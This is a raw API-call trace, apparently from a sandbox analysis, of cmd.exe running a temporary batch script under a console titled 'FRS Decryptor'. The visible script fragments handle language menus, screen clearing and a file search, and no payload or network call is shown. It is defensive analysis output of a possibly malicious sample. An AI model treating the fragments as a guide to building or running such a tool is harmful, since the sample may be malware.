returned 0x80 [0068.771] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd4 [0068.771] _tell (_FileHandle=3) returned 212 [0068.771] _close (_FileHandle=3) returned 0 [0068.771] _wcsnicmp (_String1="delims=\"", _String2="usebackq", _MaxCount=0x8) returned -17 [0068.771] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0068.771] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0068.771] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0068.771] _wpopen (_Command="find \"n\" \"C:\\FRSDecryptor\\1.txt\"", _Mode="rb") returned 0x76ea4c68 [0068.777] feof (_File=0x76ea4c68) returned 0 [0068.777] ferror (_File=0x76ea4c68) returned 0 [0068.777] fgets (in: _Buf=0x1428640, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0068.870] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 1 [0068.871] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x1428640, cbMultiByte=0, lpWideCharStr=0x1428640, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0068.871] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.871] _get_osfhandle (_FileHandle=1) returned 0xc [0068.871] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.871] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.871] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.871] SetConsoleInputExeNameW () returned 0x1 [0068.871] GetConsoleOutputCP () returned 0x1b5 [0068.872] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.872] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.872] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.872] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.872] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.872] SetFilePointer (in: hFile=0xa0, lDistanceToMove=212, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd4 [0068.873] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.873] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd4 [0068.873] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1d21, lpOverlapped=0x0) returned 1 [0068.873] SetFilePointer (in: hFile=0xa0, lDistanceToMove=240, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf0 [0068.873] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=28, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="If \\\"%n%\\\"==\\\"cn\\\" goto cn\r\nnd \"n\" \"C:\\FRSDecryptor\\1.txt\"')do set n=%%i\r\n") returned 28 [0068.873] GetFileType (hFile=0xa0) returned 0x1 [0068.873] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.873] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf0 [0068.873] GetEnvironmentVariableW (in: lpName="n", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.873] _wcsicmp (_String1="n", _String2="CD") returned 11 [0068.873] _wcsicmp (_String1="n", _String2="ERRORLEVEL") returned 9 [0068.873] _wcsicmp (_String1="n", _String2="CMDEXTVERSION") returned 11 [0068.873] _wcsicmp (_String1="n", _String2="CMDCMDLINE") returned 11 [0068.873] _wcsicmp (_String1="n", _String2="DATE") returned 10 [0068.873] _wcsicmp (_String1="n", _String2="TIME") returned -6 [0068.873] _wcsicmp (_String1="n", _String2="RANDOM") returned -4 [0068.873] _wcsicmp (_String1="n", _String2="HIGHESTNUMANODENUMBER") returned 6 [0068.873] _tell (_FileHandle=3) returned 240 [0068.874] _close (_FileHandle=3) returned 0 [0068.874] lstrcmpW (lpString1="\\\"\\\"", lpString2="\\\"cn\\\"") returned -1 [0068.874] _get_osfhandle (_FileHandle=1) returned 0xc [0068.874] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.874] _get_osfhandle (_FileHandle=1) returned 0xc [0068.874] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.874] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.874] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.874] SetConsoleInputExeNameW () returned 0x1 [0068.874] GetConsoleOutputCP () returned 0x1b5 [0068.875] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.875] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.875] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.875] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.875] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.875] SetFilePointer (in: hFile=0xa0, lDistanceToMove=240, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf0 [0068.875] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.875] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf0 [0068.875] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1d05, lpOverlapped=0x0) returned 1 [0068.876] SetFilePointer (in: hFile=0xa0, lDistanceToMove=268, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10c [0068.876] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=28, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="If \\\"%n%\\\"==\\\"en\\\" goto en\r\nnd \"n\" \"C:\\FRSDecryptor\\1.txt\"')do set n=%%i\r\n") returned 28 [0068.876] GetFileType (hFile=0xa0) returned 0x1 [0068.876] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.876] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10c [0068.876] GetEnvironmentVariableW (in: lpName="n", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.876] _wcsicmp (_String1="n", _String2="CD") returned 11 [0068.876] _wcsicmp (_String1="n", _String2="ERRORLEVEL") returned 9 [0068.876] _wcsicmp (_String1="n", _String2="CMDEXTVERSION") returned 11 [0068.876] _wcsicmp (_String1="n", _String2="CMDCMDLINE") returned 11 [0068.876] _wcsicmp (_String1="n", _String2="DATE") returned 10 [0068.876] _wcsicmp (_String1="n", _String2="TIME") returned -6 [0068.876] _wcsicmp (_String1="n", _String2="RANDOM") returned -4 [0068.876] _wcsicmp (_String1="n", _String2="HIGHESTNUMANODENUMBER") returned 6 [0068.876] _tell (_FileHandle=3) returned 268 [0068.876] _close (_FileHandle=3) returned 0 [0068.876] lstrcmpW (lpString1="\\\"\\\"", lpString2="\\\"en\\\"") returned -1 [0068.876] _get_osfhandle (_FileHandle=1) returned 0xc [0068.876] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.877] _get_osfhandle (_FileHandle=1) returned 0xc [0068.877] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.877] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.877] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.877] SetConsoleInputExeNameW () returned 0x1 [0068.877] GetConsoleOutputCP () returned 0x1b5 [0068.877] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.877] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.877] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.878] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.878] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.878] SetFilePointer (in: hFile=0xa0, lDistanceToMove=268, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10c [0068.878] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.878] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10c [0068.878] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1ce9, lpOverlapped=0x0) returned 1 [0068.878] SetFilePointer (in: hFile=0xa0, lDistanceToMove=283, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11b [0068.878] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=15, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="goto language\r\nn\\\" goto en\r\nnd \"n\" \"C:\\FRSDecryptor\\1.txt\"')do set n=%%i\r\n") returned 15 [0068.878] GetFileType (hFile=0xa0) returned 0x1 [0068.878] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.878] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11b [0068.878] _tell (_FileHandle=3) returned 283 [0068.879] _close (_FileHandle=3) returned 0 [0068.879] _wcsicmp (_String1="goto", _String2="DIR") returned 3 [0068.879] _wcsicmp (_String1="goto", _String2="ERASE") returned 2 [0068.879] _wcsicmp (_String1="goto", _String2="DEL") returned 3 [0068.879] _wcsicmp (_String1="goto", _String2="TYPE") returned -13 [0068.879] _wcsicmp (_String1="goto", _String2="COPY") returned 4 [0068.879] _wcsicmp (_String1="goto", _String2="CD") returned 4 [0068.879] _wcsicmp (_String1="goto", _String2="CHDIR") returned 4 [0068.879] _wcsicmp (_String1="goto", _String2="RENAME") returned -11 [0068.879] _wcsicmp (_String1="goto", _String2="REN") returned -11 [0068.879] _wcsicmp (_String1="goto", _String2="ECHO") returned 2 [0068.879] _wcsicmp (_String1="goto", _String2="SET") returned -12 [0068.879] _wcsicmp (_String1="goto", _String2="PAUSE") returned -9 [0068.879] _wcsicmp (_String1="goto", _String2="DATE") returned 3 [0068.879] _wcsicmp (_String1="goto", _String2="TIME") returned -13 [0068.879] _wcsicmp (_String1="goto", _String2="PROMPT") returned -9 [0068.879] _wcsicmp (_String1="goto", _String2="MD") returned -6 [0068.879] _wcsicmp (_String1="goto", _String2="MKDIR") returned -6 [0068.879] _wcsicmp (_String1="goto", _String2="RD") returned -11 [0068.879] _wcsicmp (_String1="goto", _String2="RMDIR") returned -11 [0068.879] _wcsicmp (_String1="goto", _String2="PATH") returned -9 [0068.879] _wcsicmp (_String1="goto", _String2="GOTO") returned 0 [0068.879] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.879] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ee998, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.880] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.880] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.880] SetFilePointer (in: hFile=0xa0, lDistanceToMove=283, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11b [0068.880] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.880] GetFileSize (in: hFile=0xa0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1df5 [0068.880] _wcsnicmp (_String1="lang", _String2=":EOF", _MaxCount=0x4) returned 50 [0068.880] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.880] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11b [0068.880] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.880] GetFileType (hFile=0xa0) returned 0x1 [0068.880] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11b [0068.880] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x10eea04, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10eea04*=0x200, lpOverlapped=0x0) returned 1 [0068.880] SetFilePointer (in: hFile=0xa0, lDistanceToMove=285, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11d [0068.880] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nanguage") returned 2 [0068.880] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11d [0068.880] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.880] GetFileType (hFile=0xa0) returned 0x1 [0068.880] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11d [0068.880] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x10eea04, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10eea04*=0x200, lpOverlapped=0x0) returned 1 [0068.880] SetFilePointer (in: hFile=0xa0, lDistanceToMove=296, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x128 [0068.880] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":language\r\nyptor\\1.txt\"'") returned 11 [0068.880] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.882] _get_osfhandle (_FileHandle=1) returned 0xc [0068.882] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.882] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.882] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.882] SetConsoleInputExeNameW () returned 0x1 [0068.882] GetConsoleOutputCP () returned 0x1b5 [0068.882] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.882] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.882] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.883] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.883] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.883] SetFilePointer (in: hFile=0xa0, lDistanceToMove=296, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x128 [0068.883] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.883] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x128 [0068.883] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1ccd, lpOverlapped=0x0) returned 1 [0068.883] SetFilePointer (in: hFile=0xa0, lDistanceToMove=301, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12d [0068.883] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="cls\r\nlanguage\r\nn\\\" goto en\r\nnd \"n\" \"C:\\FRSDecryptor\\1.txt\"')do set n=%%i\r\n") returned 5 [0068.883] GetFileType (hFile=0xa0) returned 0x1 [0068.883] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.883] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12d [0068.883] _tell (_FileHandle=3) returned 301 [0068.883] _close (_FileHandle=3) returned 0 [0068.883] _wcsicmp (_String1="cls", _String2="DIR") returned -1 [0068.883] _wcsicmp (_String1="cls", _String2="ERASE") returned -2 [0068.883] _wcsicmp (_String1="cls", _String2="DEL") returned -1 [0068.883] _wcsicmp (_String1="cls", _String2="TYPE") returned -17 [0068.884] _wcsicmp (_String1="cls", _String2="COPY") returned -3 [0068.884] _wcsicmp (_String1="cls", _String2="CD") returned 8 [0068.884] _wcsicmp (_String1="cls", _String2="CHDIR") returned 4 [0068.884] _wcsicmp (_String1="cls", _String2="RENAME") returned -15 [0068.884] _wcsicmp (_String1="cls", _String2="REN") returned -15 [0068.884] _wcsicmp (_String1="cls", _String2="ECHO") returned -2 [0068.884] _wcsicmp (_String1="cls", _String2="SET") returned -16 [0068.884] _wcsicmp (_String1="cls", _String2="PAUSE") returned -13 [0068.884] _wcsicmp (_String1="cls", _String2="DATE") returned -1 [0068.884] _wcsicmp (_String1="cls", _String2="TIME") returned -17 [0068.884] _wcsicmp (_String1="cls", _String2="PROMPT") returned -13 [0068.884] _wcsicmp (_String1="cls", _String2="MD") returned -10 [0068.884] _wcsicmp (_String1="cls", _String2="MKDIR") returned -10 [0068.884] _wcsicmp (_String1="cls", _String2="RD") returned -15 [0068.884] _wcsicmp (_String1="cls", _String2="RMDIR") returned -15 [0068.884] _wcsicmp (_String1="cls", _String2="PATH") returned -13 [0068.884] _wcsicmp (_String1="cls", _String2="GOTO") returned -4 [0068.884] _wcsicmp (_String1="cls", _String2="SHIFT") returned -16 [0068.884] _wcsicmp (_String1="cls", _String2="CLS") returned 0 [0068.884] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.884] GetFileType (hFile=0xc) returned 0x2 [0068.884] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.884] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10eebdc | out: lpMode=0x10eebdc) returned 1 [0068.884] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.885] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xc, lpConsoleScreenBufferInfo=0x10eebf8 | out: lpConsoleScreenBufferInfo=0x10eebf8) returned 1 [0068.885] ScrollConsoleScreenBufferW (hConsoleOutput=0xc, lpScrollRectangle=0x10eebe8, lpClipRectangle=0x0, dwDestinationOrigin=0xffe20000, lpFill=0x10eebf0) returned 1 [0068.885] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.885] SetConsoleCursorPosition (hConsoleOutput=0xc, dwCursorPosition=0x0) returned 1 [0068.885] _get_osfhandle (_FileHandle=1) returned 0xc [0068.885] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.886] _get_osfhandle (_FileHandle=1) returned 0xc [0068.886] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.886] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.886] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.886] SetConsoleInputExeNameW () returned 0x1 [0068.886] GetConsoleOutputCP () returned 0x1b5 [0068.886] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.886] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.886] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.887] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.887] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.887] SetFilePointer (in: hFile=0xa0, lDistanceToMove=301, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12d [0068.887] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.887] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12d [0068.887] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1cc8, lpOverlapped=0x0) returned 1 [0068.887] SetFilePointer (in: hFile=0xa0, lDistanceToMove=308, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x134 [0068.887] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=7, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo.\r\nnguage\r\nn\\\" goto en\r\nnd \"n\" \"C:\\FRSDecryptor\\1.txt\"')do set n=%%i\r\n") returned 7 [0068.887] GetFileType (hFile=0xa0) returned 0x1 [0068.887] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.887] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x134 [0068.887] _tell (_FileHandle=3) returned 308 [0068.887] _close (_FileHandle=3) returned 0 [0068.887] _wcsicmp (_String1="echo.", _String2="DIR") returned 1 [0068.887] _wcsicmp (_String1="echo.", _String2="ERASE") returned -15 [0068.887] _wcsicmp (_String1="echo.", _String2="DEL") returned 1 [0068.887] _wcsicmp (_String1="echo.", _String2="TYPE") returned -15 [0068.887] _wcsicmp (_String1="echo.", _String2="COPY") returned 2 [0068.888] _wcsicmp (_String1="echo.", _String2="CD") returned 2 [0068.888] _wcsicmp (_String1="echo.", _String2="CHDIR") returned 2 [0068.888] _wcsicmp (_String1="echo.", _String2="RENAME") returned -13 [0068.888] _wcsicmp (_String1="echo.", _String2="REN") returned -13 [0068.888] _wcsicmp (_String1="echo.", _String2="ECHO") returned 46 [0068.888] _wcsicmp (_String1="echo.", _String2="SET") returned -14 [0068.888] _wcsicmp (_String1="echo.", _String2="PAUSE") returned -11 [0068.888] _wcsicmp (_String1="echo.", _String2="DATE") returned 1 [0068.888] _wcsicmp (_String1="echo.", _String2="TIME") returned -15 [0068.888] _wcsicmp (_String1="echo.", _String2="PROMPT") returned -11 [0068.888] _wcsicmp (_String1="echo.", _String2="MD") returned -8 [0068.888] _wcsicmp (_String1="echo.", _String2="MKDIR") returned -8 [0068.888] _wcsicmp (_String1="echo.", _String2="RD") returned -13 [0068.888] _wcsicmp (_String1="echo.", _String2="RMDIR") returned -13 [0068.888] _wcsicmp (_String1="echo.", _String2="PATH") returned -11 [0068.888] _wcsicmp (_String1="echo.", _String2="GOTO") returned -2 [0068.888] _wcsicmp (_String1="echo.", _String2="SHIFT") returned -14 [0068.888] _wcsicmp (_String1="echo.", _String2="CLS") returned 2 [0068.888] _wcsicmp (_String1="echo.", _String2="CALL") returned 2 [0068.888] _wcsicmp (_String1="echo.", _String2="VERIFY") returned -17 [0068.888] _wcsicmp (_String1="echo.", _String2="VER") returned -17 [0068.888] _wcsicmp (_String1="echo.", _String2="VOL") returned -17 [0068.888] _wcsicmp (_String1="echo.", _String2="EXIT") returned -21 [0068.888] _wcsicmp (_String1="echo.", _String2="SETLOCAL") returned -14 [0068.888] _wcsicmp (_String1="echo.", _String2="ENDLOCAL") returned -11 [0068.888] _wcsicmp (_String1="echo.", _String2="TITLE") returned -15 [0068.888] _wcsicmp (_String1="echo.", _String2="START") returned -14 [0068.888] _wcsicmp (_String1="echo.", _String2="DPATH") returned 1 [0068.888] _wcsicmp (_String1="echo.", _String2="KEYS") returned -6 [0068.888] _wcsicmp (_String1="echo.", _String2="MOVE") returned -8 [0068.888] _wcsicmp (_String1="echo.", _String2="PUSHD") returned -11 [0068.888] _wcsicmp (_String1="echo.", _String2="POPD") returned -11 [0068.888] _wcsicmp (_String1="echo.", _String2="ASSOC") returned 4 [0068.888] _wcsicmp (_String1="echo.", _String2="FTYPE") returned -1 [0068.888] _wcsicmp (_String1="echo.", _String2="BREAK") returned 3 [0068.888] _wcsicmp (_String1="echo.", _String2="COLOR") returned 2 [0068.888] _wcsicmp (_String1="echo.", _String2="MKLINK") returned -8 [0068.888] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0068.888] SetErrorMode (uMode=0x0) returned 0x0 [0068.888] SetErrorMode (uMode=0x1) returned 0x0 [0068.888] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14243a0, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.889] SetErrorMode (uMode=0x0) returned 0x1 [0068.889] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.889] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.889] GetEnvironmentVariableW (in: lpName="PATHEXT", 